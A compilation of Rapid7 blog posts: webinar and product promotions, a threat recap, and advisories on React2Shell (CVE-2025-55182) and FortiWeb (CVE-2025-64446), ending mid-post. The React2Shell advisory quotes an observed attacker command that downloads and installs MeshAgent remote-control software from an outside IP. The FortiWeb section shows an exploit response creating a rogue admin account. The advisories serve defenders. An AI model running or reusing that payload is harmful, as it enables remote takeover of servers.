Every year, Rapid7 brings together some of the most experienced minds in cybersecurity to pause, zoom out, and take stock of where the threat landscape is heading. Last year's predictions webinar sparked lively debate among practitioners, leaders, and researchers alike, and many of those early warnings were proven accurate.

We talked about expanding attack surfaces, the acceleration of zero-day exploitation, and the shifting role of SecOps teams navigating unpredictable regulatory and operational pressure. We explored how AI was beginning to shape attacker behavior and how defenders could prepare for a world where speed and context matter more than ever. Looking back, the real takeaway was not just the predictions themselves. It was how quickly the landscape shifted around them.

This year's predictions webinar builds on that momentum. The conversation feels different now. Threat actors have adapted. Business environments have tightened. Defenders are operating with more constraints and higher expectations than at any point in recent memory. That is exactly why our experts are once again stepping up to share what they are seeing, what is keeping them curious, and what they believe security teams should be paying closer attention to as we head into 2026.

A panel shaped by diverse vantage points

One of the strengths of this session is the range of perspectives represented on the panel.

Philip Ingram, Former Senior Military Intelligence Officer at Grey Hare Media, brings a global geopolitical lens that connects cyber activity with real-world tensions and state-aligned movements. His vantage point helps translate complex geopolitical signals into practical considerations for security teams.

Raj Samani, SVP and Chief Scientist at Rapid7, offers deep insight into attacker behavior, AI-driven disruption, and the evolving threat landscape. His work tracking threat actor tradecraft and the mechanics of cybercrime economies gives him a unique perspective on how attacks scale and shift over time.

Sabeen Malik, VP of Global Government Affairs and Public Policy at Rapid7, brings a policy and regulatory perspective that is essential for understanding how global mandates and governance trends influence security operations. Her insights shed light on the intersection of cyber risk, legislative pressure, and organizational responsibility.

Together, they create a multi-dimensional picture of what is coming next. Not hype. Not speculation. Instead, grounded observations from experts who see attacker behavior unfold from very different angles.

What we learned from last year 

Last year's session made one thing clear: the forces shaping cyber risk are not isolated. They are interconnected, and they are accelerating.

We saw that:

• Attackers were closing the gap between vulnerability disclosure and exploitation.

• Identity-based compromise continued to outpace traditional malware.

• Economic and operational pressures made it harder for security teams to keep up.

• Global events had tangible ripple effects on what attackers chose to target next.

Those insights helped set a realistic direction for 2025. Only twelve months later, the ground has shifted again. AI-assisted exploitation, insider-driven breaches, geopolitical instability, and expanding exposure surfaces are changing both attacker priorities and defender responsibilities.

This webinar is not a rehash. It is a recalibration, grounded in what is actually happening across the threat landscape right now.

Themes our experts will explore

While the predictions themselves will be revealed live during the session, we can share a few of the themes shaping this year's discussion.

• How global tensions are redefining cyber risk for private organizations, even those far from the front lines

• Why identity, behavior, and access are becoming the most reliable early indicators of compromise

• Where AI is helping and hurting defenders, and how attackers are using automation and tooling to accelerate the earliest stages of intrusion

• Why context and prioritization are becoming essential as vulnerability volumes and exploitation speeds continue to rise

• How security teams can get ahead of exposure, not just react to it, through more integrated and risk-aware workflows

These are not abstract conversations. They reflect the real operational and strategic challenges security teams face every day.

Why you will not want to miss it

Whether you are leading a security program or defending in the trenches, this session will help you:

• Understand the forces shaping attacker strategy
  Identify the signals that matter most for early detection

• Anticipate the operational pressures teams will face in 2026

• Prioritize investments, workflows, and practices that support resilience

You will walk away with a clearer sense of where to focus, what to watch for, and how to prepare your team for what comes next, without getting lost in noise or speculation.

Join the conversation

This webinar is one of our most anticipated sessions of the year. If you have not registered yet, now is the perfect time to save your spot and hear directly from the experts shaping the conversation around what 2026 will look like for security teams everywhere.

Register here. 

Overview

Update #1: As of 4:30 PM Eastern, December 4, 2025, Rapid7 has validated that a working weaponized proof-of-concept exploit, shared by researcher @maple3142, is now publicly available.

Update #2: On December 5, 2025, Lachlan Davidson who discovered the vulnerability has also published a proof-of-concept. A Metasploit exploit module is also available.

Update #3: At 10:00 AM Eastern, December 5, 2025, CVE-2025-55182 was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), confirming exploitation in-the-wild has begun.

On December 3, 2025, Meta disclosed a new vulnerability, CVE-2025-55182, which has since been dubbed React2Shell. A second CVE identifier, CVE-2025-66478, was assigned and published to track the vulnerability in the context of Next.js. However this second CVE has since been rejected as a duplicate of CVE-2025-55182, as the root cause in all cases is the same and should be referred to with a single common CVE identifier.

CVE-2025-55182 is a critical unauthenticated remote code execution vulnerability affecting React, a very popular library for building modern web applications. This new vulnerability has a CVSS rating of 10.0, which is the maximum rating possible and indicates the highly critical nature of the issue. Successful exploitation of CVE-2025-55182 allows a remote unauthenticated attacker to execute arbitrary code on an affected server via malicious HTTP requests.

The vulnerability affects React applications that support React Server Components. While the vulnerability affects the React Server Components feature, server applications may still be vulnerable even if the application does not explicitly implement any React Server Function endpoints but does support React Server Components. Additionally, many popular frameworks based on React, such as Next.js, are also affected by this vulnerability.

A separate advisory was published by Vercel, the vendor for Next.js. This advisory tracks the impact of CVE-2025-55182 as it applies to the Next.js framework, and provides information for Next.js users to remediate the issue. 

As of this blog’s publication on December 4, 2025, there is no known public exploit code available. Several exploits have been published claiming to exploit CVE-2025-55182; however, they have not been successfully verified as actually exploiting this vulnerability. This has been noted in the original finder’s website, react2shell.com. Although broad exploitation has not yet begun, we expect this to quickly change once a viable public exploit becomes available.

Organizations who use React or the affected downstream frameworks are urged to remediate this vulnerability on an urgent basis, outside of normal patch cycles and before broad exploitation begins.

Mitigation guidance

CVE-2025-55182 affects versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of the following React packages:

• react-server-dom-webpack

• react-server-dom-parcel

• react-server-dom-turbopack

A vendor-supplied update for the above packages is available in versions 19.0.1, 19.1.2, and 19.2.1. Users of affected React packages are advised to update to the latest remediated version on an urgent basis.

Downstream frameworks that depend on React are also affected, this includes (but is not limited to):

• Next.js

• React Router

• Waku

• Parcel

• Vite

• RedwoodSDK

For the latest mitigation guidance for React, please refer to the React security advisory. For the latest mitigation guidance specific to Next.js, please refer to the Vercel security advisory.

Rapid7 customers

Exposure Command, InsightVM and Nexpose

An unauthenticated check for CVE-2025-55182 has been available to Exposure Command, InsightVM and Nexpose customers since the December 4th content release. Note that the first iteration of the check was a "potential" type check which was later revised to a non-potential (normal remote check) one on Friday, the 5th December.

Intelligence Hub

Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-55182, including indicators of compromise (IOCs), Yara and Sigma rules.

Observed exploitation

As of December 8, 2025, Rapid7 honeypots have observed exploitation attempts of CVE-2025-55182 using the same RCE technique from the PoC published on December 4, 2025. While the exploit attempts seen on our honeypots match the RCE technique from that original PoC, the actual payloads being delivered (i.e. what the attackers are trying to execute on a compromised server), are now different and show malicious intent.

One such example we are seeing is the deployment of MeshAgent remote control software, which if successful will allow an attacker to remotely control newly compromised systems from a centralized location. The decoded malicious payload command can be seen here:

[ "$EUID" -eq 0 ] && URL="https://156.67.221.96/meshagents?id=hrfDDhB%40yNf4oBrCH%40R%24KfVp27XfA78LiX%40IZUxoTgs3zCwG%24bjdpR%400oa8%40BhTf&installflags=0&meshinstall=6" || URL="https://156.67.221.96/meshagents?id=yGNhrz51DRyitgqtVyaSjJU3GsIKSJpCfD5aQ%24QPcbjBXNVeFkiZg1LAmWYOQyP4&installflags=0&meshinstall=6"; wget -O /tmp/meshagent --no-check-certificate "$URL" && chmod +x /tmp/meshagent && cd /tmp/ && ([ "$EUID" -eq 0 ] && ./meshagent -install || ./meshagent -connect)

The behavior of this payload is shown below.

Indicators of compromise (IOCs)

IP Addresses

• 156.67.221[.]96

Updates

• December 4, 2025: Several minor edits for punctuation and grammar.
• December 4, 2025: Coverage availability for Rapid 7 customers.
• December 4, 2025: PoC validation updated.
• December 5, 2025: The original finder has also published their PoC. A Metasploit exploit is available.
• December 5, 2025: Added reference to CISA KEV.
• December 8, 2025: Updated coverage information.
• December 8, 2025: Added Intelligence Hub coverage to the Rapid7 customers section. Added an Observed exploitation section.

In cybersecurity today, regulation is everywhere, but resilience isn’t keeping pace.

In this episode of Experts on Experts: Commanding Perspectives, Craig Adams chats with Sabeen Malik, VP of Public Policy & Government Affairs at Rapid7, about what’s broken (and what’s promising) in today’s regulatory landscape.

Sabeen pulls from her experience across diplomacy, operations, and government relations to highlight where policy too often fails to account for how risk actually works. From insider threats to government shutdowns, it’s a sharp, timely look at how security leaders should approach strategy, structure, and compliance going into 2026.

Key themes:

• The growing trust gap between public, private, and institutional actors

• Why insider threats are a cultural problem, not just a controls one

• Where UK and US guidance is falling short on resilience

• What small and midsized businesses are still missing

• Why AI, exposure, and threat governance need to be connected

Whether you're thinking about AI use cases or modern regulation fatigue, this episode offers a much-needed reset.

Watch the full video.

AI dominates headlines, yet one cornerstone of security operations keeps evolving to meet today’s threats. Security Information and Event Management (SIEM) has come a long way from basic logging. Modern platforms unify threat detection, investigation, and response with automation, context, and AI, so analysts can act faster and with confidence. That is the focus of our new Next-gen SIEM Buyer’s Guide.

Why this guide now

Many teams are still wrestling with legacy SIEMs that were built for storage and compliance, not for today’s hybrid environments or AI-enabled adversaries. The market is crowded and the language is inconsistent, which makes evaluation tough. This guide cuts through the noise with a practical definition of next-gen SIEM and a clear set of evaluation criteria grounded in outcomes, not buzzwords. It explains how a SIEM should help you see more, decide faster, and respond with precision, by pairing analytics with automation and exposure context.

In this guide you will learn the core capabilities that define a next-gen SIEM, including high-fidelity data ingestion, curated detections, AI-assisted triage, automation, and integrated exposure context. Next, you’ll better understand how to assess platforms for usability, scalability, and total cost of ownership without sacrificing effectiveness. Finally, we will offer some questions to ask vendors so you can separate claims from proof and align the solution to your team’s workflows and maturity. The guide also highlights where SIEM sits alongside adjacent tools and why data quality, context, and integrated workflows matter more than feature lists.

Who should read it

Security leaders and practitioners who are evaluating SIEMs, planning a modernization, or looking to improve analyst efficiency and overall SOC performance will find practical guidance they can use in vendor conversations and internal planning. If your goals include reducing false positives, accelerating investigation and response, and tying detections to business risk, this guide will help you level set your needs with the right requirements.

How Rapid7 approaches next-gen SIEM

Rapid7’s approach brings detection and response together in a single, streamlined experience that helps analysts identify, investigate, and contain threats faster. Rapid7’s next-gen SIEM delivers curated detections mapped to attacker behavior, reducing false positives and surfacing high-priority alerts with clear context. Integrated investigation and response workflows guide analysts from alert to action within one interface, linking threat intelligence, identity, and asset data to drive faster, more confident decisions. Built on the Rapid7 Command Platform, this unified approach consolidates visibility across endpoints, networks, cloud, and SaaS environments, enabling coordinated detection and response without tool sprawl.

Get the guide

Download Rapid7’s Next-Gen SIEM Buyer’s Guide to learn how to evaluate platforms that deliver measurable detection and response outcomes, not just more data. If you want to see how these principles show up in the product, explore the Rapid7 Command Platform.

Every great product experience starts with a smooth beginning. But in the world of cloud security, onboarding can sometimes feel like an obstacle course. Detailed fine-grained Identity and Access Management (IAM) configurations, lengthy deployment steps, and manual permission setups can turn what should be an exciting first impression into a tedious chore.

That’s changing. Rapid7 has enhanced the onboarding experience for Exposure Command and InsightCloudSec by integrating with AWS IAM temporary delegation - a new AWS capability that lets customers approve deployment access directly in the AWS console. The result? A faster, simpler, and more secure path to getting up and running in the cloud.

Why onboarding matters - and why it often fails  

The first minutes with a new platform matter. It’s the difference between “this is amazing” and “I’ll come back to it later.”

In cloud environments, setup usually involves multiple AWS services - compute, storage, networking, access management - all of which must be configured precisely to maintain security. Traditionally, customers have had to manually create IAM roles, adjust trust relationships, and fine-tune permissions just to let a partner solution like Rapid7 deploy resources.

It’s not just time-consuming; it’s error-prone. Misconfigured roles can cause deployment failures or unnecessary security risk. Support teams spend hours walking customers through the process, and the friction delays time-to-value. When scaling across dozens or hundreds of AWS accounts, those delays multiply fast.

Meet AWS IAM temporary delegation: What it is and why it matters

AWS IAM temporary delegation simplifies the entire setup journey. It allows trusted partners like Rapid7 to automate deployment securely - but only after the customer grants explicit, time-bound approval.

Here’s how it works: When you initiate onboarding from within Rapid7’s interface, you’re redirected to the AWS console. There, you can review the exact permissions Rapid7 is requesting and how long access will last. Once approved, AWS provides Rapid7 with temporary credentials to complete the setup. After the time window expires, that access ends automatically.

No long-term IAM keys, no manual role creation, and no guesswork. Customers stay in control, with full visibility and auditability. It’s automation with accountability built in.

How Rapid7 is putting this into action

With the latest release, Rapid7 has integrated this capability directly into Exposure Command and InsightCloudSec, creating a guided onboarding experience that happens almost entirely inside the Rapid7 interface.

Here’s the new flow:

1. Customers configure deployment options in Rapid7’s InsightCloudSec environment.
2. A temporary delegation request appears via an AWS console pop-up.
3. An authorized AWS user reviews and approves the request.
4. Rapid7 automatically deploys the necessary resources on the customer’s behalf.

This streamlined workflow eliminates dozens of manual steps and reduces onboarding time from hours to minutes. It’s faster, simpler, and still fully aligned with AWS’s strict security model. 

Speed, simplicity, and security

This integration hits the sweet spot between automation and trust:

• Speed: Customers can start realizing value from Rapid7’s cloud security solutions in minutes instead of days.

• Simplicity: The UI-driven process means no wrestling with IAM policies or JSON templates.

• Security: Access is temporary and permission-scoped. Customers retain complete oversight through the AWS console and CloudTrail logs.

For organizations with compliance or security governance requirements, this is the ideal balance: operational efficiency without compromising control.

Beyond onboarding: What this says about Rapid7 and AWS alignment

This update isn’t just about faster onboarding. It’s a glimpse into Rapid7’s broader partnership with AWS. Rapid7 has long been an AWS Advanced Tier Partner, building integrations that help customers manage security across cloud-native environments. From leveraging AWS telemetry in MXDR to integrating with AWS services like CloudTrail and GuardDuty, Rapid7’s platform has been designed to meet customers where they already operate within AWS.

By adopting AWS IAM temporary delegation early, Rapid7 reinforces its commitment to cloud-first innovation and shared responsibility principles. Customers get the assurance that their onboarding, deployment, and operations all align with AWS security best practices. 

What this means for customers

If you’re deploying Rapid7 Exposure Command (Advanced or Ultimate) or InsightCloudSec on AWS, here’s what to expect:

• A guided onboarding experience that automates AWS resource setup.
• A faster, less error-prone workflow that still keeps you in control.
• The ability for authorized users to approve temporary access requests directly in the AWS console.

Before onboarding, make sure someone in your organization has the permissions to approve delegation requests. After deployment, review your CloudTrail logs as part of normal governance;  you’ll see every action logged and time-bounded.

Value from day one

Onboarding shouldn’t be a hurdle. And now with AWS IAM Temporary Delegation and Rapid7’s enhanced experience, it no longer is. Together, AWS and Rapid7 have reimagined what “getting started” looks like in the cloud - faster, more intuitive, and just as secure as you need it to be.

It’s one more way Rapid7 is helping organizations unlock value from day one, while staying aligned with AWS’s best practices for identity, access, and automation.

See how easy secure onboarding can be.Explore Rapid7’s listings for Exposure Command and InsightCloudSec straight from the AWS Marketplace.

Outsmart attackers with smarter rules

Managing network security in a dynamic cloud environment is a constant challenge. As traffic volume grows and threat actors evolve their tactics, organizations need protection that can scale effortlessly while delivering robust, intelligent defense. That's where a service like AWS Network Firewall becomes essential, and we’re excited to partner with AWS to make it even more powerful.

What is AWS Network Firewall?

AWS Network Firewall (AWS NWF) is a managed service that provides essential, auto-scaling network protections for Amazon Virtual Private Clouds (VPCs). While its flexible rules engine offers granular control, defining and maintaining the right rules to defend against evolving threats is a complex and resource-intensive task.

Manually creating and updating rules often leads to coverage gaps and creates significant operational overhead. To simplify this process and empower teams to act with confidence, Rapid7 is proud to announce the availability of Curated Intelligence Rules for AWS Network Firewall. As an AWS partner, we convert our curated intelligence on Indicators of Compromise (IOCs) from into high-quality rule groups, delivering expert-vetted threat intelligence directly within your native AWS experience.

Harnessing industry-leading threat intelligence

In the world of threat intelligence, more isn’t always better. Too many low-fidelity alerts generate noise, distract analysts, and leave teams chasing false positives. At Rapid7, our approach is different. We focus on delivering high-fidelity intelligence, enabling customers to zero in on the threats most relevant to their unique environments. 

Rapid7 Curated Intelligence Rules embody this same approach, and are built on three key principles:

⠀
Focus on quality over quantity - Rules emphasize meaningful, low-noise detection directly aligned with current, real-world threats, significantly reducing alert fatigue.

Curated global intelligence - Rule sets are powered by high-quality, region-specific data from unique sources, providing unparalleled visibility and context for actionable detections.

Dynamic and self-cleaning rule sets - Threat intelligence is not static. Using Rapid7’s proprietary , rules are automatically retired when an IOC passes a certain threshold, ensuring the delivered intelligence is always fresh, relevant, and current.

⠀

We’re launching with two distinct rule sets, each designed to address today’s most pressing threats:

• Advanced Persistent Threat (APT) campaigns: Targets the subtle and persistent techniques used by state-sponsored and sophisticated threat actors.

• Ransomware & cybercrime: Focuses on the tools, infrastructure, and indicators associated with financially motivated attacks.

⠀

These rule sets are updated daily to ensure you have the most current protections. Furthermore, our intelligence is dynamic. When an IOC passes a certain threshold in our proprietary Decay Scoring system, we remove it from the rule set. This process guarantees that the intelligence you receive is always current and actionable, significantly reducing alert fatigue.

^{The operational advantage}

These Curated Intelligence Rules deliver immediate and tangible value, allowing your team to:

• Automate threat protection: Reduce overhead with curated, continuously updated detections delivered natively within AWS Network Firewall.

• Adopt protections faster: Deploy protections powered by Rapid7 Labs intelligence with just a few clicks in the console.

• Maintain predictable operations: Rely on AWS-validated updates, clear rule group metadata, and transparent per-GB metering.

Common use cases addressed

Our rule sets provide practical defense against a wide range of attack scenarios. You can:

• Block command and control (C2) communication from known malware families

• Detect network reconnaissance activity associated with advanced persistent threats

• Prevent data exfiltration to malicious domains linked to cybercrime groups

• Identify and stop the download of malware payloads from compromised websites

• Alert on traffic to newly registered domains used in malicious activities

Get started with Curated Intelligence Rules for AWS NFW today

Ready to enhance your cloud security with curated, actionable intelligence? Add our rule sets to your and strengthen your organization’s defenses in minutes.
››› Visit the listing in the AWS Marketplace to learn more.

As we close out 2025, one thing is clear: the security landscape is evolving faster than most organizations can keep up. From surging ransomware campaigns and AI-enhanced phishing to data extortion, geopolitical fallout, and gaps in cyber readiness, the challenges facing security teams today are as varied as they are relentless. But with complexity comes clarity and insight.

This year’s most significant breaches, breakthroughs, and behavioral shifts provide a critical lens through which we can view what’s next. That’s exactly what we’ll explore in our upcoming Security Predictions for 2026 webinar, where Rapid7’s experts will break down where we are now, what to expect next, and how organizations can proactively adapt.

Before we look ahead, let’s take stock of what defined 2025 and what it tells us about the state of cybersecurity today.

Ransomware: Same playbook, more precision

Ransomware remains one of the most consistent and costly threats facing organisations today, but the approach has shifted. According to Rapid7’s Q3 2025 Threat Landscape Report, data extortion continues to dominate, with groups increasingly focused on exfiltration and disruption rather than encryption alone. Over 80% of ransomware cases handled in Q3 involved data theft, often staged and timed to maximise leverage.

Threat actors like RansomHub, BlackSuit, NoEscape, and Scattered Spider continue to refine their operations. Many campaigns are multi-stage and collaborative, with Initial Access Brokers providing footholds that are later sold to ransomware operators. One common thread is a focus on identity and infrastructure abuse - attackers are compromising vSphere environments, exploiting misconfigurations in third-party platforms, and abusing legitimate remote access tools to move laterally before launching extortion phases.

These incidents increasingly target complex organizations with sprawling digital footprints. The result? Weeks of operational downtime, lost revenue, regulatory scrutiny, and enduring brand damage. In this landscape, ransomware is no longer just a malware problem - it’s a business continuity issue, a supply chain risk, and a board-level concern.

The offense is automated: AI goes to work

This year, we saw AI break through hype and land firmly in attackers' toolkits. Tools like WormGPT, FraudGPT, and DarkBERT gave cybercriminals an entry point to generate convincing phishing emails, polymorphic malware, and credential-harvesting scripts, all without needing advanced coding skills.

In our AI Offense blog, we detailed how these tools lower the barrier to entry and amplify the volume and sophistication of social engineering campaigns. Pair that with deepfakes, cloned voices, and LLM-powered targeting, and security teams now face threats that are faster, cheaper, and harder to detect than ever before.

The takeaway? AI is not a future threat. It is here. And defenders must embrace its potential just as aggressively as attackers have.

The human factor: Still the weakest link

Despite improved tooling, attacker playbooks still rely heavily on people. Our recent exploration of evolving social engineering trends highlighted the rise of Microsoft Teams-based impersonation, remote access tool abuse such as Quick Assist, and multi-stage credential compromise.

The fallout has been widespread. From attacks on major UK retailers to multiple airline disruptions and critical public sector breaches, social engineering is no longer just email phishing. It is phone calls, voice cloning, fake calendars, and chat-based manipulation.

Training helps. But attackers are innovating faster than awareness campaigns can keep up. Security teams need to simulate these threats internally and invest in visibility across identity platforms, because credentials remain the crown jewels.

From awareness to action: Resilience as a mandate

A growing number of incidents in 2025 underscored the readiness gap in many organizations. Our recent blog on preparedness broke down the UK’s National Cyber Security Centre guidance urging companies to revisit their offline contingency planning, including printed IR protocols and analog communications in case digital systems are taken offline.

This call followed a sharp rise in high-impact events, with over 200 nationally significant cyber incidents recorded in the UK alone this year.

The lesson? Cyber resilience is not a nice to have. It is foundational. Detection, backup, and patching are essential, but so is building response plans that assume failure, simulate outages, and bring the entire business to the table.

Join us: Predicting what’s next in 2026

We’ll explore these trends and where they’re heading in much greater depth in our Security Predictions for 2026 webinar, taking place on December 10.

Rapid7’s experts will unpack:

• Which attacker tactics are here to stay and which are on the rise

• Where AI, regulation, and infrastructure gaps are creating new exposures

• How defenders can better prioritise risk and operate in resource-constrained environments

• What CISOs, SOC leaders, and engineers need to align on in 2026 to stay ahead

This is our biggest global webinar of the year, and it is designed to help security professionals at every level get proactive and stay ahead of what’s next.

Register now and join thousands of security professionals from around the world as we set the stage for 2026. Because when the threat landscape keeps shifting, your best defense is a head start.

Overview

On October 6, 2025, the cyber deception company Defused published a proof-of-concept exploit on social media that was captured by one of their Fortinet FortiWeb Manager honeypots. FortiWeb is a Web Application Firewall (WAF) product that is designed to detect and block malicious traffic to web applications. Exploitation of this new vulnerability, now tracked as CVE-2025-64446, allows an attacker with no existing level of access to gain administrator-level access to the FortiWeb Manager panel and websocket command-line interface. Rapid7 has tested the latest FortiWeb version 8.0.2 and observed that the existing public proof-of-concept exploit does not work. However, the exploit does work against earlier versions, including version 8.0.1, which was released in August, 2025. 

Based on the information circulated by Defused, this new vulnerability is claimed to have been exploited in the wild in October, 2025. On November 14, 2025, Fortinet PSIRT published CVE-2025-64446 and an official advisory for the critical vulnerability, which holds a CVSS score of 9.1. Organizations running versions of Fortinet FortiWeb that are listed as affected in the advisory are advised to remediate this vulnerability on an emergency basis, given that exploitation has been occurring since October in targeted attacks, and broad exploitation will likely occur in the coming days. A Metasploit module for CVE-2025-64446 is available here, and security firm watchTowr has published a technical analysis. CISA's KEV catalog has been updated to include CVE-2025-64446.

It’s unclear whether the FortiWeb release cycle intentionally included a silent patch for this vulnerability or merely coincidentally included changes that broke the existing exploit.

On November 18, 2025, Fortinet published a new advisory for CVE-2025-58034. This new vulnerability is an authenticated command injection affecting FortiWeb. Fortinet has indicated CVE-2025-58034 has also been exploited in-the-wild, and CISA's KEV catalog has been updated to include this new vulnerability. It is not clear at this time if both CVE-2025-64446 and CVE-2025-58034 have been exploited in-the-wild together as an exploit chain.

This blog post will be updated as new developments arise.

Rapid7 observations

On November 6, 2025, Rapid7 Labs observed that an alleged zero-day exploit targeting FortiWeb was published for sale on a popular black hat forum. While it is not clear at this time if this is the same exploit as the one described above, the timing is coincidental.

⠀

Mitigation guidance

On November 14, 2025, Fortinet published an advisory that outlines remediation steps and workaround mitigations for CVE-2025-64446. According to Fortinet, the following versions are affected, and the fixed versions for each main release branch are also listed:

• Versions 8.0.0 through 8.0.1 are vulnerable, 8.0.2 and above are fixed.
• Versions 7.6.0 through 7.6.4 are vulnerable, 7.6.5 and above are fixed.
• Versions 7.4.0 through 7.4.9 are vulnerable, 7.4.10 and above are fixed.
• Versions 7.2.0 through 7.2.11 are vulnerable, 7.2.12 and above are fixed.
• Versions 7.0.0 through 7.0.11 are vulnerable, 7.0.12 and above are fixed.
  

In cases where immediate upgrades are not possible, the advisory states the following: “Disable HTTP or HTTPS for internet facing interfaces. Fortinet recommends taking this action until an upgrade can be performed. If the HTTP/HTTPS Management interface is internally accessible only as per best practice, the risk is significantly reduced.”

Rapid7 Labs has confirmed that older unsupported versions of FortiWeb 6.x are also vulnerable to both CVE-2025-64446 and CVE-2025-58034. Customers using unsupported versions of FortiWeb should update to a supported version, as described above.

Exploitation behavior

When testing the public exploit against a target FortiWeb device, the target application’s differing responses between versions 8.0.1 and 8.0.2 are included below.

Against version 8.0.1, the application returns the following response for a successful exploitation attempt, in which a new malicious local administrator account “hax0r” was created:

HTTP/1.1 200 OK
Date: Thu, 13 Nov 2025 17:57:28 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self'; upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 1202

{ "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1, "name": "hax0r", "access-profile": "prof_admin", "access-profile_val": "1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": "", "hidden": 0, "domains": "root ", "gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "", "sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val": "0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX", "wildcard": "disable", "wildcard_val": "0", "accprofile-override": "disable", "accprofile-override_val": "0", "fortiai": "disable", "fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763056648, "history-password-pos": 1, "history-password0": "ENC XXXX", "history-password1": "ENC XXXX", "history-password2": "ENC XXXX", "history-password3": "ENC XXXX", "history-password4": "ENC XXXX", "history-password5": "ENC XXXX", "history-password6": "ENC XXXX", "history-password7": "ENC XXXX", "history-password8": "ENC XXXX", "history-password9": "ENC XXXX", "force-password-change": "disable", "force-password-change_val": "0", "feature-info-ver": "" } }

⠀

However, against version 8.0.2, the application returns the following “403 Forbidden” response for an unsuccessful exploitation attempt:

⠀

HTTP/1.1 403 Forbidden
Date: Thu, 13 Nov 2025 17:28:42 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self'; upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Content-Length: 199
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
</body></html>

Rapid7 customers

Exposure Command, InsightVM and Nexpose

Exposure Command, InsightVM and Nexpose customers can assess their exposure to both vulnerabilities described in this blog post as follows:

• CVE-2025-64446: an unauthenticated vulnerability check is available in the November 14 content release. Please note that the “SAFE” check mode needs to be disabled while running scans to ensure the check for CVE-2025-64446 runs successfully.
• CVE-2025-58034: an authenticated vulnerability check is available in the November 26 content release. There is no need to disable the “SAFE” check mode, since the CVE-2025-58034 check will run by default.

Intelligence Hub

Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-64446, including a Sigma rule and IOCs of IP addresses attempting to exploit this vulnerability.

Updates

• November 14, 2025: The blog post has been updated to reflect the newly-published official advisory and CVE identifier, the availability of vulnerability checks and a Metasploit module for customer testing, the CISA KEV addition, and a published technical analysis.

• November 17, 2025: The Rapid7 customers section has been updated to add Intelligence Hub coverage, and clarify that vulnerability checks were shipped on Nov 14, 2025.

• November 19, 2025: The Overview section has been updated to reference the newly published vulnerability, CVE-2025-58034. The Rapid7 customers section has been updated to add expected coverage availability for CVE-2025-58034.

• November 19, 2025: The Rapid7 customers section has been updated with CVE-2025-58034 coverage information for supported FortiWeb release branches.

• December 1, 2025: The Mitigation guidance section has been updated with confirmation that older unsupported versions of FortiWeb 6.x are also vulnerable to both CVE-2025-64446 and CVE-2025-58034.

We’re proud to share that Rapid7 has been recognized as a Leader in the 2025 Gartner® Magic Quadrant™ for Exposure Assessment Platforms (EAP). We believe this recognition underscores our commitment to redefining security operations by embedding continuous, business-aligned exposure management into the core of modern defense strategies.

Our approach: Exposure Command at the core

At the root of Rapid7’s leadership is Exposure Command, our unified exposure management solution, underpinned by complete attack surface visibility, threat-informed risk assessment and integrated automated remediation capabilities.

Key capabilities highlighted in the report include:

• Unified visibility across environments: Broad attack surface visibility with native support across hybrid infrastructure including on-prem, cloud, containers, and IoT/OT, alongside extensive integrations with third-party security and ITOps tools.

• Threat-validated prioritization: Prioritization enhanced with real-world exploit intelligence, plus continuous red teaming and ad-hoc penetration testing through comprehensive managed services.

• Comprehensive, AI-driven remediation: Prebuilt workflows and playbooks, intelligent automation, and dynamic persona-centric reporting.

Why exposure assessment matters more than ever

The security landscape has fundamentally changed. Traditional vulnerability management largely centered around point-in-time scans and CVSS scores can no longer keep pace with the dynamic, hybrid environments that define today’s enterprise. Organizations face an ever-expanding attack surface across cloud, on-prem, SaaS, and OT environments while regulations continue to evolve. 

This means a dramatic expansion in the scope of IT and security leaders from tech-centric systems management and patching to a core pillar of the business at large. As a result, exposure management is no longer about finding more; it’s about finding what matters and acting on it decisively. This aligns directly with Gartner’s CTEM model, which calls for a continuous, outcome-focused cycle of scoping, prioritization, validation, and mobilization.

Why CTEM + EAP are the future of risk reduction

CTEM isn’t just a buzzword and a new acronym, it’s the next evolution of proactive security, acknowledging a core truth: no organization can patch everything, nor should they try.

The goal is validated exposure reduction through five stages:

1. Business-aligned scoping (e.g., revenue-generating services, critical data systems)

2. Cross-domain discovery (cloud, identity, SaaS, on-prem, OT)

3. Threat-informed prioritization with real-world intelligence

4. Validation via attack-path modeling or adversary emulation (e.g., PTaaS, BAS, AEV)

5. Mobilization through integrated, repeatable remediation workflows

Gartner suggests CTEM is a way to translate technical vulnerabilities into business-relevant risks and mobilize cross-functional teams in response. EAPs, which Gartner defines as platforms that continuously identify and prioritize exposures across all environments with business and threat context, provide the operational foundation for CTEM.

⠀

⠀

Rapid7’s EAP capabilities allow teams to operationalize CTEM by translating technical findings into business-relevant risk and enabling cross-functional response, bridging the gap between posture and business continuity.

Looking ahead

